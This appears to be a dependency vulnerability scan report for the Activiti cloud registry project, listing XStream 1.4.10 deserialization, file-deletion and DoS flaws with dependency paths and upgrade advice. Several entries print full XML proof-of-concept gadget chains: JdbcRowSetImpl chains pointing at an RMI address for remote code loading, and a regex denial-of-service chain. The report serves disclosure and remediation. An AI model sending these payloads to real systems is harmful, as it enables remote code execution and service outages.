Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
      <m__DTMXRTreeFrag>
        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
          <m__size>-10086</m__size>
          <m__mgrDefault>
            <__overrideDefaultParser>false</__overrideDefaultParser>
            <m__incremental>false</m__incremental>
            <m__source__location>false</m__source__location>
            <m__dtms>
              <null/>
            </m__dtms>
            <m__defaultHandler/>
          </m__mgrDefault>
          <m__shouldStripWS>false</m__shouldStripWS>
          <m__indexing>false</m__indexing>
          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
              <javax.sql.rowset.BaseRowSet>
                <default>
                  <concurrency>1008</concurrency>
                  <escapeProcessing>true</escapeProcessing>
                  <fetchDir>1000</fetchDir>
                  <fetchSize>0</fetchSize>
                  <isolation>2</isolation>
                  <maxFieldSize>0</maxFieldSize>
                  <maxRows>0</maxRows>
                  <queryTimeout>0</queryTimeout>
                  <readOnly>true</readOnly>
                  <rowSetType>1004</rowSetType>
                  <showDeleted>false</showDeleted>
                  <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
                  <listeners/>
                  <params/>
                </default>
              </javax.sql.rowset.BaseRowSet>
              <com.sun.rowset.JdbcRowSetImpl>
                <default/>
              </com.sun.rowset.JdbcRowSetImpl>
            </fPullParserConfig>
            <fConfigSetInput>
              <class>com.sun.rowset.JdbcRowSetImpl</class>
              <name>setAutoCommit</name>
              <parameter-types>
                <class>boolean</class>
              </parameter-types>
            </fConfigSetInput>
            <fConfigParse reference='../fConfigSetInput'/>
            <fParseInProgress>false</fParseInProgress>
          </m__incrementalSAXSource>
          <m__walker>
            <nextIsRaw>false</nextIsRaw>
          </m__walker>
          <m__endDocumentOccured>false</m__endDocumentOccured>
          <m__idAttributes/>
          <m__textPendingStart>-1</m__textPendingStart>
          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>
          <m__pastFirstElement>false</m__pastFirstElement>
        </m__dtm>
        <m__dtmIdentity>1</m__dtmIdentity>
      </m__DTMXRTreeFrag>
      <m__dtmRoot>1</m__dtmRoot>
      <m__allowRelease>false</m__allowRelease>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Arbitrary File Deletion

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary File Deletion. A remote attacker can delete arbitrary known files on the host as long as the executing process has sufficient rights, by manipulating the processed input stream.

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.15 or higher.

References

Arbitrary File Deletion vulnerability report

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Denial of Service (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.20 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
          <packet>
            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
                      <jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>
                      <uriProperties/>
                      <attributeProperties/>
                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
                        <getter>
                          <class>com.sun.rowset.JdbcRowSetImpl</class>
                          <name>getDatabaseMetaData</name>
                          <parameter-types/>
                        </getter>
                      </inheritedAttWildcard>
                    </bi>
                    <tagName/>
                    <context>
                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
                        <outer-class reference='../..'/>
                      </marshallerPool>
                      <nameList>
                        <nsUriCannotBeDefaulted>
                          <boolean>true</boolean>
                        </nsUriCannotBeDefaulted>
                        <namespaceURIs>
                          <string>1</string>
                        </namespaceURIs>
                        <localNames>
                          <string>UTF-8</string>
                        </localNames>
                      </nameList>
                    </context>
                  </bridge>
                </bridge>
                <jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
                  <javax.sql.rowset.BaseRowSet>
                    <default>
                      <concurrency>1008</concurrency>
                      <escapeProcessing>true</escapeProcessing>
                      <fetchDir>1000</fetchDir>
                      <fetchSize>0</fetchSize>
                      <isolation>2</isolation>
                      <maxFieldSize>0</maxFieldSize>
                      <maxRows>0</maxRows>
                      <queryTimeout>0</queryTimeout>
                      <readOnly>true</readOnly>
                      <rowSetType>1004</rowSetType>
                      <showDeleted>false</showDeleted>
                      <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
                      <params/>
                    </default>
                  </javax.sql.rowset.BaseRowSet>
                  <com.sun.rowset.JdbcRowSetImpl>
                    <default>
                      <iMatchColumns>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                      </iMatchColumns>
                      <strMatchColumns>
                        <string>foo</string>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                      </strMatchColumns>
                    </default>
                  </com.sun.rowset.JdbcRowSetImpl>
                </jaxbObject>
              </dataSource>
            </message>
            <satellites/>
            <invocationProperties/>
          </packet>
        </indexMap>
      </comparator>
    </default>
    <int>3</int>
    <string>javax.xml.ws.binding.attachments.inbound</string>
    <string>javax.xml.ws.binding.attachments.inbound</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. An attacker can manipulate the processed input stream and replace or inject objects, that result in executed evaluation of a malicious regular expression, causing a denial of service.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='java.util.Scanner'>
                <buf class='java.nio.HeapCharBuffer'>
                  <mark>-1</mark>
                  <position>0</position>
                  <limit>0</limit>
                  <capacity>1024</capacity>
                  <address>0</address>
                  <hb></hb>
                  <offset>0</offset>
                  <isReadOnly>false</isReadOnly>
                </buf>
                <position>0</position>
                <matcher>
                  <parentPattern>
                    <pattern>\p{javaWhitespace}+</pattern>
                    <flags>0</flags>
                  </parentPattern>
                  <from>0</from>
                  <to>0</to>
                  <lookbehindTo>0</lookbehindTo>
                  <text class='java.nio.HeapCharBuffer' reference='../../buf'/>
                  <acceptMode>0</acceptMode>
                  <first>-1</first>
                  <last>0</last>
                  <oldLast>-1</oldLast>
                  <lastAppendPosition>0</lastAppendPosition>
                  <locals/>
                  <hitEnd>false</hitEnd>
                  <requireEnd>false</requireEnd>
                  <transparentBounds>true</transparentBounds>
                  <anchoringBounds>false</anchoringBounds>
                </matcher>
                <delimPattern>
                  <pattern>(x+)*y</pattern>
                  <flags>0</flags>
                </delimPattern>
                <hasNextPosition>0</hasNextPosition>
                <source class='java.io.StringReader'>
                  <lock class='java.io.StringReader' reference='..'/>
                  <str>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</str>
                  <length>32</length>
                  <next>0</next>
                  <mark>0</mark>
                </source>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>0</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
